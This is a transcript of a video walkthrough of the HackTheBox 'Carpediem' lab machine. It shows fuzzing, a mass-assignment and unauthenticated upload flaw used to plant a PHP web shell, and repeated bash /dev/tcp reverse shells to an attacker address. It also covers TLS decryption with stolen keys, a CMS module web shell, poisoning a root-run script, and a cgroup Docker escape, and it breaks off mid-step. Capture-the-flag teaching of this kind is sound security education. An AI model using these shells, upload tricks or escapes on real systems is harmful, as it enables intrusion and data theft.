What's going on YouTube? This is Ipsec. I'm doing Carpediem from HackTheBox, and I really like this box because there's multiple passageways throughout it. The very first one is the foothold. You find a web portal, and you're supposed to use a mass assignment vulnerability to upgrade your user to an admin user that then leaks an upload functionality of the site. But the upload functionality doesn't require authentication, so it's also an IDOR vulnerability, and you can find the upload function if you just fuzz the API. So there's two different ways to upload a shell to the site. And then once you get on the box, there's some things to do with voice over IP, creating a soft phone to access someone's voice mailbox to get a password. There's some RSA decryption because you can TCPDump and a browser's not using a secure HTTPS cipher. There's a pretty cool Docker escape. There's a MongoDB instance you can enumerate. There's just so much going on in this box, so let's just jump in. As always, we're going to start off with the Nmap, so -sc for default scripts, SV enumerate versions, OA output all formats, put in the Nmap directory and call it Carpediem, and then the IP address of 10.10.11.167. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. If we want to see exactly what distribution it is, we can copy the 8.2.p1 and the for Ubuntu, throw it into Google, and Google will tell us this is, I believe, a Ubuntu Focal, right? So we know exactly what distribution this likely is. The next thing we have is HTTP on port 80. It's running Nginx version 1.18.0. And I'd also like to just check if this is a version that's common in Focal. So we can go here, find a package, and once this comes back, click Nginx, and we see it is indeed bundled with Focal quite often. So right now, it looks like this is just one box. If this was like Nginx 1.16 or 1.20, a page that's not there, I would be thinking Docker is at play or some type of like routing, so network address translation or something. But no real interesting output via Nmap. So let's just take a look at the website. So let's copy this link and go to the page. And we get a just generic countdown. We do have the host name being leaked right here, so carpediem.htb. So I'm going to do sudo vi etc host, and then we can do 10.10.11.167. And I would probably run a GoBuster here just to see if there's any other pages, but at this point, I know it's not, and I don't want to waste too much time. I checked index.html. This page comes back. PHP doesn't. So I know this is a static web page. We can try subscribing, so I'll do root at ipsec.rocks. Let's make sure we go over to Burp Suite when we do this because we want to test for things like SQL injection. Click on subscribe, and it just gets index.html ? We don't have root.ipsec.rocks here, so this button does absolutely nothing. I'm going to start just doing a virtual host fuzz on Carpediem, seeing if there's any type of subdomains here, because that's the only thing this website is communicating to us. So I'm going to do Ffuf-u, not carpediem.htb. Let's do HTTP 10.10.11.167. And then the host header, we'll do host:/fuzz.carpediem.htb. And the word list, we'll use opt sec list discovery DNS subdomains. Let's do 5000.txt, right? I'm just going to hit enter. We see the output, and I'm going to do filter size 2875 because we want to hide everything with that size. I'm going to also do match code all -mc all. And the reason why I'm doing that is because Ffuf has this annoying habit of having the matcher hard-coded to only certain status codes. I like matching all status codes, so that's why I do MC all. And we see portal comes back right away. So I'm going to go back into our host file, so sudo vi etc host, and we can add 10.10.11. We had Carpediem there. We can do portal.carpediem.htb. Okay. And looking at this, it looks like when I changed my size, the like standard out buffer screwed up, but only portal comes back. So let's take a look at portal.carpediem.htb, and we get the motorcycle store portal. So I'm going to click on a link just to see exactly how this website works. We go to a page, we have P equals bikes and C equals something. right off the top, I'm thinking this is like some type of secure parameter thing. I'm guessing P is equal to page and C is equal to checksum. So I'm going to try bikes.php to see if this page exists. And it looks like it does. I'm just going to put something that doesn't exist here. We get a 404. So I've confirmed. I'm guessing this P is going to append .php to this. Now, the next thing I want to check is this checksum. What I think is happening here is the web server is taking the P parameter, right? And it's going to prepend or append some type of secret, right? And what this would do is prevent us from being able to modify this parameter. So it's really easy to test. Let's just see if there's any other P we can get. So if I go to categories, let's do sports bikes, scooter. So this bikes is changing and the C isn't. So that's different. Is there brand? Let's go brand. Brand is now changing into S. So this is definitely not a checksum. Did not mean to go to BBC. Portal Carpediem. I don't know what I clicked on that. That was weird, right? Maybe click here. There is view bike. So I bet view bike is a page, right? So if I change view bike to bikes, we still get something. If I put anything here, we get 404. Index.php probably exists. So I'm going to change it to that. And it's hanging. And we get an error message. So what happened here is we included index. And then that include tried to include index again. And we just did it until we ran out of memory. So now we have confirmed there's definitely LFI here. And this C is not checksum. If we went to like crackstation.net, we could potentially crack this. So let's see. Fire hydrants. Check. Oh, come on. I hate these captchas. Verify new images. Come on. This is like the slowest load I've ever seen. There we go. And this is equal to 1. So I'm guessing each of these is in a database, and this checksum is going to a different page. So since we know the checksum is being at play, we should test for SQL injection as well. So let's turn intercept on, put this in. There's going to be two things we test in this parameter. First, SQL injection. Let's put a single quote. Okay, that did not work. Let's do nothing. We get 21,412 bytes. I'm going to put a single quote, 10,000 bytes. Let's put a comment at the end, still 10,000. Change that. 19,000. That was weird. That's a different thing. I'm not sure exactly what happened there. I was expecting only 20,000 or we'll have to check what the page looks like with a double quote there. So let's just turn Burp Suite off. I'm going to send a double quote. And we get no bike listed. Put a comment. No bike listed. So I'm guessing the parameter is going to be indeed a single quote. But there's no SQL injection here. So let's move on and play with this. So we got the bikes. I'm just going to go into here and see if we can extract the source code. So php:/filter convert.base64-encode, and then resource is equal to bikes, right? If I can spell it right. And we get 404 not found. So I'm not exactly sure what's happening here. We know we're probably at the start of the include, but maybe the include is checking if the file exists before it loads the page. And if it was doing that, then this whole PHP filter, the file doesn't exist, so it doesn't load the page. I would take note of this potential vulnerability, but it's literally the first thing I saw when I started taking a look at this page. So just take note of it and move on, because that could be a rabbit hole. So let's try the login feature. If I try admin, invalid credentials, I'd probably send this to like SQL map after testing for basic injection. Don't see it here. Don't see it in the password either. We can click create account, and let's just do ipsec for all the parameters, and then we'll intercept it. So proxy, intercept on, click on register, and I did not intercept here. Shoot. Let's log out real quick. Log out, create account, IPsec for everything. We'll do IPsec2 for that. And then intercept on, register. So we can see it's doing a post to classes master.php function is equal to register. And right now, I'd probably start fuzzing this function because this looks like an API, and I always like testing APIs. So let us, I don't know why it's doing that. Let's do Ffuf, I'm in caps lock, -u, http portal.carpediem.htb / classes master this, and then fuzz this function. And what do we want to do? The word list, opt, sec list, discovery. Is it web content API? API, actions.text. Okay. So we can do a Ffuf here. We probably want to filter size for 0, match code all, and only register. And we notice that register is not case sensitive. They both go to the same thing. But we know the API directory is in this classes. So I wonder if there's anything else, right? So this is where I'm going to run GoBuster. So GoBuster-u, put this, and we also want to put it in directory mode, -x for extension PHP, word list, opt, sec list, discovery, web content, raft, small words, .text. And we're going to see if there's any other fields, right? So we got a login.php in this classes directory. See if there is anything else. We probably should hide all 403s, but oh well. And I'm just going to let this run, and we'll come back to when it's done. It's not done yet. You see it's only at like 6%, but the one I wanted to show off did come back, users.php, right? So I'm just going to kill this for the sake of time, and we can run Ffuf against it. And this is an unintended path, but this is actually how I attacked this box when I did it. So we can put users.php here, and we're still going to fuzz for all the parameters. I'm guessing this f is equal to function, right? So we're testing this API now if there's any other user functions, and we have upload, right? So let's go take a look at what this feature is. So I'm going to pass this over to repeater. I'm going to do users.php, f is equal to upload, and we get error multi-part form data missing. So at this point, we have to create a upload form. And the way I'm going to do this is just cheating a little bit. We're going to use chat.openai.com because that's been all the rage lately. So here I am at chat.openai.com, and we just ask it questions. So if I just say create an HTML upload form, we can see it's going to give me all the code. So I'm probably going to replace this with, we'll replace Stack Overflow with this because it's just so cool. We got the form. We can make dir www, go in here, vform.html, paste this in, and start a web server. So now let's go localhost /form.html, port 8000. Let's take this burp suite off so we get there. Insert something. I'm just going to do bloodhound.desktop. And what we want to do here is intercept the request. So I'm just going to upload. And now we have what an upload form looks like. We need this content type and then all this data, right? So I'm going to copy this and paste it into this request where we have it missing something, right? The only thing I need to make sure is I don't have content type twice in this request. And I don't think I do. Let's see, content type, I do. So get rid of this one because it's multi-part form encoded. I did not highlight everything. Come on, stop going up. There we go. And we send it, and we get error missing file upload and form data. It's looking for file underscore upload, and we have file dash upload from our just example. So I'm going to change that to be this, and we see it says it uploaded it. So at this point, I'm going to try testing for uploading a PHP shell. So let's do $PHP system get. I don't do a quote there. CMD, right? This is it. And we can just do shell.php. So it says it uploaded it. I'm probably just going to escape that one backslash, and we'll see if we can access it. So turn this off. Portal Carpediem /uploads. Cannot blank execute command because we did not give it. So if command equals ID, we have it here. So I'm going to do, I should have done request here. So let's replace it. I'm just going to do this because it's easier to put a reverse shell in a request than it is otherwise. I think this has to be all capitals, actually. I didn't know that. Let's try this again. So this one with all capitals. Okay. So send this to Burp Suite, and we can get a shell. And then I'm going to show the intended way of finding all this, because the intended way is also interesting. I just wanted to highlight like the power of fuzzing when you come across an API, right? So dev TCP 10 14 8 9001 0 and 1. Copy. We can get rid of this web server nclvmp 9001. What? There we go. And we have a shell. So I'm going to take a step back real quick before we do a lot of enumeration here. And we're going to do this the intended way, right? So let's go back to portal.htb or portal.carpediem.htb and make sure we are logged out. Awesome. So now we can go back to the account registration. So I'm just going to register a new account, and we'll just put junk in this, address, username. We'll call this IPsec3, I guess, and intercept this request. And I think this part may have been unintended, but I wanted to show it as well. We send this over to the repeater tab and put like a single quote in the username, we get a SQL error out telling us the syntax, right? So I'm just going to copy all of this, and we'll see if we have any hidden parameters. Come on. Copy. Wow, there's a lot of syntax. There we go. So we have this insert into users, and then it's setting first name, last name, contact, gender, address, username, password. Right here, we know the password's going to be MD5sum right now, but we don't have any extra parameters here. And we can test for mass assignment because we see this error message by just doing and we'll do please is equal to subscribe. And then when I send this, we're going to search this request for please, and we can see it putting this in our insert statement. So if we knew how this application stored like in the database, we could add a parameter that says admin or group is equal to 0, which is probably admin, or admin equals true. If we know how to define admin at this point, we can register an account and make ourselves admin, because the registration script of this API is just taking like PHP input, like anything we put here, and crafting a SQL statement out of it, right? So at this point, I can't really take advantage of it because this isn't a completely easily findable open source application, at least not that I could find. So I can't look at how the database works. We can make a lot of guessing, but it's not a intuitive thing, right? But if we go to our account, and if we go to manage account, and we try to update this, so let's turn intercept on, click update, and we look at this, we can see login underscore type. So this was like a hidden parameter on our account page. And this is the database field for an account. So on the registration, if we put login_type is equal to 0, it would have put that in the request and we would have created an admin account. But we can just do it here because it's like a mass assignment type of thing. We forward it and account has been updated successfully. If we refresh this page, it doesn't give us any new information. But if we guessed like /admin, account denied. What? I thought I changed my account to be an admin. Let's try this again. So put this in, intercept on, click update, login type is equal to this. I wonder if I need to put my old password in. Or maybe me refreshing, put it back to 2. Access denied. Okay, this is weird. That's how you're supposed to do it. I'm guessing it's because I'm putting an invalid password or something. So I'm going to restart this. We'll just do ipsec for everything. And in this creation, I'm going to do login_type and see if we can get it this way. The demo gods have me, and I did not intercept the request. So we'll try it this way again. So ipsec4 should be the password. Burp suite. Intercept is on. Login type is equal to this. Forward. Account has been updated. I'm just going to go to portal Carpediem /admin. Access denied. I wonder if I should re-log in. Log out, log in. ipsec4, ipsec4. Try /admin. Access denied. Maybe we should try login type is equal to 1. Maybe it's not 0. Manage account. And this is where I'm upset I'm showing the intended path without ever really fully testing it. Let's see. Login type is equal to 1. It's weird that it was blank there. Account has been updated. /admin. Okay, login type is supposed to equal 1. If you do 0, you get an error. But here, if we go to submit ticket or quarterly report upload, action, add, and then continue, and we look at this request, it's sending us to this class's upload.php, which we've already shown how to exploit, right? So let's now just continue with the box. It's obvious we're in a container because we have this host name that looks like a Docker thing. But before we enumerate, I want to just get a proper PTY. So let's do this real quick. Spawn bash like this. And then stty raw -echo fg enter. So now I have tab autocomplete. I'm also going to do export term is equal to xterm because I like clearing the screen. Since we're in a Docker container, I'm guessing there's no other users in passwd. That's odd. We have TCPDump. So maybe we can run TCPDump. We'll take a look at that in a minute. But the main thing I want to get is credentials out of this, right? So I'm going to do find.grep config because that's normally a good name to use to look for a configuration file. And if we look at this, let's see. I'm guessing it's dbconnection.php. That sounds like a good place to look. So less classes, let's cat this, I guess. And we have MySQL credentials. So we could take a look at MySQL. It's not actually going to show us anything, so I'm not going to do that. But we get a credential we could save, and maybe it's a user credential in the box, but nothing really there. We go into classes to see what else there is. There is Truedesk.php. If I look at what this is, we see Truedesk.carpediem.hdb, some type of API key, and a portal. So let's take a look at this domain. So sudo vi etc host, and we can take a look at TrueDesk Carpediem. Go here. Let's turn this off. We just get a login page. So the first thing I would do is try guessing a credential, right? And if we go all the way up, we have this password. So we could try like logging in with this password and this username, right? And combine these things to see if this is like a global password. We don't get logged in. But we do have an API key. So I wonder how we can use this API key. I'm going to Google TrueDesk GitHub to see if this is just open source software. And it looks like it is. So is there documentation? Let's see. API. Let's see. TrueDesk API. Maybe we just Google this. docs.truedesk.whatever. Let's see. API key can be found in your profile. Send the API key in the access token header with each request. So all we do is make a request to the API and send our key with it, right? Or access token. I'm trying to find example to test. So if we do get API v1 users. Okay. So let's get a request here. This, send it, and then we can do API v1 users, and we get invalid access token, which is good. We didn't put the access token yet. It tells us to put it in the header like this, I believe. We can go back, grab this, and paste. Maybe it needs 2 line breaks. Not authorized for this API call. We put this invalid access token, so we know we're doing the API correctly here now. So what we want to do is see what functionality we have, right? And this is a help desk, so we probably want to get tickets, right? So if I go here, we can do get API v1 tickets and the UID. If I just get the API v1 tickets, what happens? We just get a blank thing. I'm guessing that means there's no tickets assigned to our user. There is a search capability, so we could try searching. So search, and then search is equal to something. So tickets, search is equal to, I'm going to do I or A, and we're not getting anything. So I'm guessing we can't search for tickets. If we knew like a UID, we could probably get this, and we could fuzz this as well. But one of the things that's really helpful is looking at the source code. Since this is open source, we have that ability, right? So I'm going to grab this string, go to the GitHub page, and see if we can find this real quick. So search in this repository and see what comes up. We can turn Burp Suite off. Maybe that'll make it go a little bit faster. And let's see. We have this routes.js, and this gives us a lot more endpoints than the actual documentation did. And this is somewhat common in just APIs that not everything gets documented. And one of the super helpful one is the stats command, right? So if we do ticket stats, we can see the most active ticket has a UID of 1006. And we could just grab this and we have the ticket, right? So this is probably the easiest way to do this step. There is an unintended way. Since we're in a Docker container, we don't have access to like ifconfig or SS or IP, so we'd have to enumerate proc. But if I did like proc TCP, or proc net TCP, I think, we get IP addresses, right? And this is IP addresses encoded in hex. So I think AC is 172. Let's see. Let's Google IP hex encode to decimal, I think. And we can put this here. I should have used the chat OpenAI thing for this, right? We can see, yeah, 172.17.06. So 0.1 probably exists. I'm guessing do we have ping? We do. 172.17.05. See, we can ping other Dockers on this. And the MongoDB database for this ticketing system is exposed. So we can upload like Chisel and then just Mongo dump this out, right? And maybe we'll do that at the end of the video. But we have all the information we want here. So let's read the ticket. We could also fuzz for all the tickets. So like 1001, 1002, 3, 4. 4 is a ticket. 5, 6, whatever. So let's see. I'm just going to copy this actually to a file so we can grep. So copy this. This is a long request. Okay. V ticket.json, paste, cat this, pipe it to JQ, and then let's see. We want to get the fields that are probably used for talking to users so we can actually read this easily. We don't want owner, network engineer. Let's see. Ticket created. Comment. Let's just grep for comment. And let's see. Thanks, Robert. The employee ID is 9650. All set up. When he gets to his office on his first day, have him log into his phone first. I'll leave him a voicemail with his initial credentials for access. His phone's PIN code will be 2022, and he can dial *62. Also let him know if he wants to use a desktop for the soft phone. We've been testing Zoiper with some users on an end phone, so we're going to look at what Zoiper is. So first, I'm just going to do apt search Zoiper, and it doesn't look like it's in the apt repository. So if I just Google this, we see it's a free VoIP SIP phone dialer. So I'm going to go over to download, and let's see, we should be able to download for Linux. I think this may be it. Click on the Debian package, save it, and it looks like it is saving. Now that it's downloaded, I'm just going to do sudo dpackage-i downloads Zoiper, the Debian package, and it should download. It looks like it's unpacking Zoiper 5. So let's just run this and continue as a free user. And we need user at the SIP name, right? And it looks like all our messages, were they up here? They were. So we should copy this. So let's see. What do we need here? We need user. And username should be the last 4, so 9650. So vnotes.text 9650 at domain. We don't know that. And I think the pin code he said was 2022. So the pin code is the year. I would try all voicemails for this pin code as well. But we need to figure out what the actual domain of this is. We could just guess at like Zoiper.htb, right? Or not Zoiper, Carpediem 9650 at Carpediem.htb 2022. If we click login, it looks like that may be wrong or going. So it found IX and SIP. So let's just go in, and I guess we can skip this. And how do we get to voicemail? If we click this, click here to learn more to upgrade. That's not right. Let's try calling yourself, because that's generally how you can access voicemail on phones. So if we do this, we just get call ended, so it doesn't look like that works. If we went back to the actual notes, it does tell us that we can dial *62 to access voicemail. So I'm going to do this and hope the sound comes through.
Password.
It wants the password. So let's, how do we do this? How do I enter numbers?
Login incorrect. Password.
The keypad is not available right now. That's weird. There we go.
Login incorrect. Password.
I think I just hung up. Let's do *62 dial.
Password.
There we go. 20.
You have one new message. Press 1 for new messages. First message received May 18th, 2022 at 5:56 p.m.
Come on.
Hey Horace, welcome aboard. We certainly needed more network engineers to assist with the infrastructure. Your account is ready to go. Your password is capital A, U, capital R, J, 4, P, X, Q, 9, Q, capital P, K. Please reset it at your earliest convenience as well as your phone PIN code. Let me know if you have any issues. Robert.
Press 3 for advanced options. Press 5 to repeat the current message. Press 7 to delete this message. Press 8. First message
I think he said the
received
username as well.
May 18th, 2022 at 5:56 p.m.
Hey Horace, welcome aboard. We certainly needed more network engineers
So
to
I
assist
can't
with the
make out the
infrastructure.
username. Let's go back in the tickets and maybe the username's actually there. I'm going to search for 2022. And let's see, that's calling. Let's see, hey Adam, voicemail set up on his phone. Initial credentials. Can dial. So we should look more at this ticket because we don't know what the username is. And maybe they sent it in the ticket. Here it is. We got the subject of the ticket. New employee onboarding. hflaccus. I guess that's the name. And based upon the naming convention, it's probably H and then the last name. So let's try SSHing in with the last name or the username of hflaccus. So SSH at carpediem.htb. Copy this password. Paste it in. And we get on the box. And because it says Carpe Diem, not some random name, we know we're not in a Docker container right now. Anyways, the first thing I'm going to look for is just files in my home directory, and there's nothing really of interest. So we'll go up one directory, look at other users on the box, and just see if we can access any directories. It doesn't look like we can. We do a ps-ef, or it looks like we can't see other processes running. If I cat etsy fs tab, let's see. How is proc mounted? Hide PID equals 2. So we can't look at other processes that are running by not us because /proc is mounted with this hide PID equals 2. So we can't snoop on processes. We knew Docker was running though. Let's see. SS, LNTP. We can see a list of all the ports that are listening. So I'm guessing 8000, 8001, 8002 kind of go to different containers. Sometimes if you look at Etsy host, you can link other host names of the box, which we see backdrop.carpediem.htb. So if I go into my host file, so Etsy host, and try this, and we go browse, it doesn't give us anything new. So let's try just setting up a proxy real quick. So I'm going to, on a very new line, hit squiggly C, so it drops us into the SSH prompt, and -D 1080 for a dynamic SOCKS proxy on port 1080. And I can configure my browser to use that as a proxy, and we can try hitting each of these ports, right? forbidden on 8000. 8001 is TrueDesk. And 8002 is a bad request because it wants to talk HTTPS. So let's try HTTPS here. Let's view this certificate to see what it says. Backdrop.carpediem.htb. So this is definitely going to be the backdrop CMS. And we get well, not logged in here, but we just have this page, right? And we can try logging in, trying like admin and things, and don't get anything. If we ran linps on the box or just think back to when we were enumerating Docker containers at TCPDump, it's installed on this box. So if you do which TCPDump, and it's also installed with a capability that allows any user to run it. And again, linps would tell us this, or we can just git cap and see the capabilities there. And if we do, let's see, ipaddr to list all the interfaces, there is a Docker interface. So we can snoop in all the traffic running on this box on Docker, right? So tcpdump-i, docker 0-w. I'm just going to write to my home directory, output.cap. And actually, we should do -s0 to capture everything. And I'm going to let this run for a minute, and then we'll analyze the output. Okay, I think it's been about a minute. We probably captured enough data. We see 272 packets. So if I go in my home, we have output.cap. So let's just try downloading it real quick. Let's see. scp hflaccus at carpediem.htb output.cap to my directory. And we can copy this password, paste it. And now if I just wireshark on output.cap, we should be able to load this up and see what data is here. Let's make this a little bit bigger. So I'm going to go to Preferences, Layout, Font and Colors. And we can change this. Let's go up to 24. Does this work immediately? Oh man, maybe I don't want to make it this big. Preferences, Font and Layout. Let's go to 18. 18 should be a fine size that both of us can use. Okay, so it looks like a lot of this data is SSL encrypted, right? We could try tcp.port is equal to 8002. We don't really get anything. And that's because we're on the Docker interface. It's talking to that IP probably over 443 or something. And we just see TLS data, which is encrypted data. If we look at the hello packet and look at TLS, the transport layer security, we can dig into this a little bit. So the handshake, I'm on hello protocol. And if we look at this extension, let's see, pre-shared a key. So this is the client saying everything they support. So I want to go to the actual key exchange. And the font size is messing me up a little bit. Okay, key exchange here. And we see the handshake protocol is going to be RSA. And when it's RSA, this is, I don't see any like port forward secrecy or PFS or things like that. Can I open up another Wireshark real quick? See if this works. Demo gods are probably going to have me at this one. That did not work. Let's run Wireshark with sudo, because I just want to go to Google so you can see what a normal thing looks like, right? Because finding RSA on a web server is, I want to say, somewhat odd, because most of it is, I forget the algorithm, but not RSA, right? So let's go to Google. So we got our data here. It's using a lot of quick. Come on. Key exchange. Server hello done. Where is it? Server hello. Change cipher. Is this it? Handshake. Key exchange. Protocol. Yeah, EC Diffie-Hellman. So this one supports Diffie-Hellman does port forward secrecy. So it's going to generate a secret key between both this and the client, and we can't just decrypt data with a certificate. But because this is TLS version 1.2 and it's RSA encrypted, if we had the certificate to this, we'd be able to decrypt it, right? So let's go back to our host. Let's see, where's my SSH session? I think it's on this panel. Nope. Clean up this a little bit. Here we go. So I'm going to find / username hflaccus, see if there's anything here. Because all we're doing is looking for a certificate at this point. So maybe let's send everything to error and grep for backdrop. And we have SSL certificates right here. So let's see if we can download these real quick. So let's SCP them. We can just do SCP hflaccus at carpediem.htb .star. Copy the password. Paste. Okay, so now we have the RSA certificates. If we go back into file of this, let's see, it's been a while since I've done this. Preferences, RSA keys. Let's see. Is it add new key file? I don't think it is. Maybe it is. Okay. Let's see. Did it suddenly decrypt these? I don't think it did. Because I'm not seeing just HTTP yet. Maybe I can refresh. Control R. Yes. Control R to refresh, and we can see we now have actual decrypted data. So we can follow the HTTP stream, and we get a username and password. So let's copy this to a text file. So v notes.txt. I already have that. Be lazy. Save it like this. And we can delete everything after this. Sweet. So we should be able to log into backdrop.cms. So where was that? Right here. Paste the password. Paste the user. Log in. And we have to do our proxy. I did Control-Shift-R so it resends my whole payload, and we log into this backdrop CMS. Now, whenever you're an administrator of a web application, chances are you want to look for some type of plugin or module functionality, because that's how you can add code to the application. So I click on the install modules and go to manual installation, and we can upload a module theme or layout. So if I just Google, let's Google, first we have to turn our proxy off because we're proxying through the box. So I'm going to go backdrop module example, go to Google, and they have some examples on this page. Let's just download it. And then we can move, downloads, examples, and then unzip examples. And we just can pick any example we want. I'm going to try like a form example real quick. And I'm just going to see if I can add a file to this. So I'm going to say cmd.php, and we're just going to keep it really simple. System request cmd, like this. And then zip -r for recursive, form example.zip, the file name I want, and like this. So now when I go and upload this module, so let's see, examples, go to form example.zip. Let's make sure we're proxying again to go through because we're using the SSH proxy. Upload it. And let's see, into file, form example does not define a type and attribute. So I'm guessing this example was wrong. So let's see. I'm going to change this. See, is there a type? Since I'm getting it off the website, I don't think it's out of date. I was thinking it may have been out of date, but maybe not. Let's look at the info. Why isn't... there we go. Type. Let's see, type equals module. I'm just going to try this real quick. If this one doesn't work, then we will find a different example. So form example.zip, zip-r. Let's try this again. It looks like it worked by just randomly adding the variable it asked for. So enable newly, oh, I probably did not want to do that. Okay, it's still disabled here. So we want to find out where this dropped to disk. So I bet if I just Google GitHub backdrop, and we need to turn the proxy off, we can guess at where it gets stored. So let's see, probably modules. So we called it form_example. So what I'm going to do is go to /modules, forbidden, this is good, form_example, forbidden, that's good, because if the module didn't exist, we get this, right? So we can try cmd.php, we get a blank page. If we do cmd equals ID, we get this. So now we have code execution on this box. So let's, I guess we can do this and hope it works. Dev TCP 10.10.14.8, 9001, 0, and 1, like this. I bet it's not going to work. I forget the trick to do this in a GET request. See LVMP 9001. Yeah. So one of these variables in this does not like URL encoding. I'm guessing it's the ampersand. So let's see. I can just do this in Burp Suite real quick. Decoder, encode as URL, %26. Let me try putting this in %26 and hoping for the best. Still nothing. Okay. I think I can go in Burp Suite and we can configure this to use a proxy. Upstream proxy server, 127.0.0.1, proxy host, 0.0.1.10.80. See, is this going to work? Oh, shoot. Not upstream proxy. We have a socks proxy right here. So 127.0.0.1, 10.80. Use socks proxy. So now I should be able to use Burp Suite and go through this tunnel. It's got a different SSL certificate. That is fine. Awesome. So let's try this again. I wonder if there's a cleanup script that just blocked me. Because we're getting a 404 not found. Is it just on this directory? If it is, we'll have to re-upload the module. Yeah, so we'll re-upload it. But before, let's just create our command. And as I'm typing this, I realized I missed one of those ampersands. So I wonder if I URL encoded both of them, if it would have worked. Okay. We can go to Burp Suite, turn intercept off. And let's see, we want to go to back a few times. Admin reports, admin modules. Okay. Let's re-upload this. Form examples.zip, upload, installation successful. That's not the thing I want to send. This is. It's hanging. And we have a shell. So we're in a different Docker now. I'm going to do Python 3-c, import pty, pty.spawn, bin bash. Oh shoot, FG. Let's see, which Python 3, which script. Okay, we have the script binary. So I think I can do script -q bin bash. Let's see. Script -q dev null. There we go. stty raw minus echo fg enter enter. Bash. And now I have tab autocomplete. So we did that with the script binary. And now we're in this Docker, which is DropCMS. If we do a PS on this, we can see there is this thing that is running sleep. Our terminal cut it off, so let's fix our terminal. stty-a. We want rows 26, columns 105. So stty rows 26, col 125. Is it cols? There we go. PSEF. And now it's not cutting off because we fixed our terminal. But we can see it's executing this script, heartbeat.sh, every 45 seconds. So let's take a look at the permissions on this. Root owns it, and only root can write. So let's take a look at heartbeat.sh. And we can see, let's clear the screen first and then do it. Export term is equal to xterm. Now this is a bit cleaner. So at the very top, we got this checksum, and it's doing an MD5 sum on var_dub_dub HTML backdrop whatever. And if the checksum is not this, then it's going to exit. So it looks like we can't modify this file. So it's going to do PHP against backdrop.sh and set this root directory. So since we can't modify this file, let's see if this file controls anything, right? And looking at this, let's see. Even though it ends in .sh, it is a PHP script, which is weird, and is going to execute an instance of backdrop. So we set the working directory to where it is. And is this just going to like execute index.php? I believe so. It's a long script, but we go var_dub_dub HTML. We got index.html and backdrop. So let's see. What was that script that I just catted? Let's grep index out of that. And it's looking for index.php. So that's the script it's going to execute. So maybe it goes into backdrop. And is there index.php here? There is. So the web server looks like it's probably going to execute this PHP script, as stupid as this injection is. Let's do a lsla on index.php, and dub data can write to it. So if we vi index.php, not found. I'm going to hate my life if I do this. Nope, nano not found. I guess we can just create another reverse shell. So I'm guessing root is running this, right? And I want to get to the root user of the Docker container because I'm assuming I need root to break out. You can't really break out of a Docker container as a low priv user. So if root is executing this, I should get a shell as root, and then we can start looking at ways to escape Docker. So let's do cd temp, lsla here. I'm doing lsla to see if it looks like there's a protected temp directory. So if I saw like Apache Nginx directories here, I'd probably switch to a different directory because that means something's protecting this directory. The system djail is what I was going to say. So let's just do echo and then bin bash to ipsec.sh. By cat ipsec.sh, we see bin bash. And then let's put a blank line. And I know there's a way we could probably cat direct it to like end of file. Oh, I just did something bad. Do that again. And then we're going to do 2 pipes so we don't overwrite it. But I was going to say we could cat do the end of file thing, but I never remembered how to do that off the top of my head. So this is generally how I do it. Bash -i dev TCP 10.10.14.8 9001 0 at and 1. I'm going to put this in single quotes to make sure we don't convert any of these to special characters. So if I cat temp ipsec.sh, we have a reverse shell. And if I execute this, we can verify it works. So now what we want to do is go back to var www HTML backdrop, and then we can do echo the PHP, so system/temp ipsec.sh to index.php. And we want to put a semicolon here. And before I direct it to a file, let's just see what this looks like. Does it look like it's going to be good PHP? It does look like it's going to be good PHP. We can put a bash ahead of it just so we know it executes that way. And then pipe this to index.php. And what was it? It ran like every 45 seconds, I think. ps-ef grep opt. Every 45 seconds, it runs heartbeat.sh, which, if we did it correctly, we should get a shell. So I'm just going to sleep for 45 seconds, and we'll see if when the sleep finishes, if we have a root shell. Oddly enough, it looks like it ran, and I didn't get a shell. So let's tail-1 index.php. Let's go back in backdrop. I think because like the cron ran, it didn't exist. And maybe I was already in this directory and I wrote to the file and it was like an old inode because every minute it's replacing this directory. So to account for that, I'm going to go up one directory and write to it this way. And if this is the case, it's going to be a really odd case, but we can go in backdrop real quick, do a ls. We can see the files here. I'm going to sleep 45, and when the sleep is done, I'm going to do a ls again, and we're probably going to see no files, and we'll go out one directory, up one, and see files again. That's just because I'm in this directory, something replaces it, and kicks me out of the directory, and it's just a weird shell behavior. So we'll see if that's the case here. Okay, the sleep finished, and I still don't have a shell. If I do ls, we still have all the files. Tail-1 index.php does not exist. If we do this again, this is going to be really annoying. Tail-1, we see the command there. Let's do tail-2 actually. So that looks fine, right? This PHP code should be executed. And if I do php-i or php-a, I think it's in interpreter mode, we can run this. And temp ipsec, no such file. So I'm guessing something cleaned up my temp file. So let's see. ls/temp. Yeah, temp ipsec does not exist. So that's what was happening here. There's some type of cleanup script that went and cleaned this up. So let's do dev-shm and see if it still gets erased. So we can echo. Then we want to do a blank line. And then, what was it? --i. Like this. Cat ipsec.sh. It exists there. Ver www HTML. And let's see. That's not what we want. Let's go up. Where is it? Here. Dev-shm. So let's go in backdrop real quick. Oh, there we go. So we got the shell. It was definitely the cleanup scripts that were giving us a problem. So script-q dev-shm. or script-q dev null stty raw minus echo fg enter enter. Export term is equal to x term. And now we have a root shell on this Docker container. And this privesc was really tough to find because it relies on a CVE, because if we look at the actual capabilities, so if we just do cap sh, decode this, this is capability effective. All these are the same, so it doesn't really matter. But these are the effective capabilities that we have. None of these are really abusable. And there is a CVE to enable more capabilities. It pretty much enables all of them. But both linps and deepc, I don't believe, find this vulnerability. It came out right around the time this box released. So if I just Google Unit 42 cgroup, I think it'll show up. So it is this post, right? And I'm not going to go over the entire post. One of the best ways of explaining it, OXDF did a post on this vulnerability. If we just Google OXDF cgroup, we can see he digs into cgroups and exactly what it is. Cgroup goes in, like, if you just read this comic, right, it explains it really well. It's just like a group of processes. And then the overlayfs system is where the vulnerability actually is. So if you've used Docker before, you have, like, I want to say images and containers, and the containers can all use the same image, and then they spawn their own file system off that image. So that way, if you have a Ubuntu image and 10 containers, you're not using the whole disk of Ubuntu 5 times, because that may be like 1 or 2 gigs, and you keep reusing that same space. So overlayfs is a way to overlay a file system on top of another file system, which saves space. And that's what this comic is explaining. But highly recommend reading this post because it does do a decent job at explaining everything. But the Unit 42 post essentially says, if we type unshare -urmc bash, we get this error, but now I'm going to cat proc $status. And we see the capability effective has changed, right? So I do cap sh -decode, do this, and we have all the capabilities. So anytime we've done a Docker escape, we can just redo that. Wonder if, like, dev, I don't have like dev SDA, so I don't have the full disk. I think that would have to be shared at the start. But the best way probably to get code execution is to attack overlayfs. So what I'm going to do is mount -t cgroup-o rdma cgroup /mount. And before I run this, we can do an ls command. So 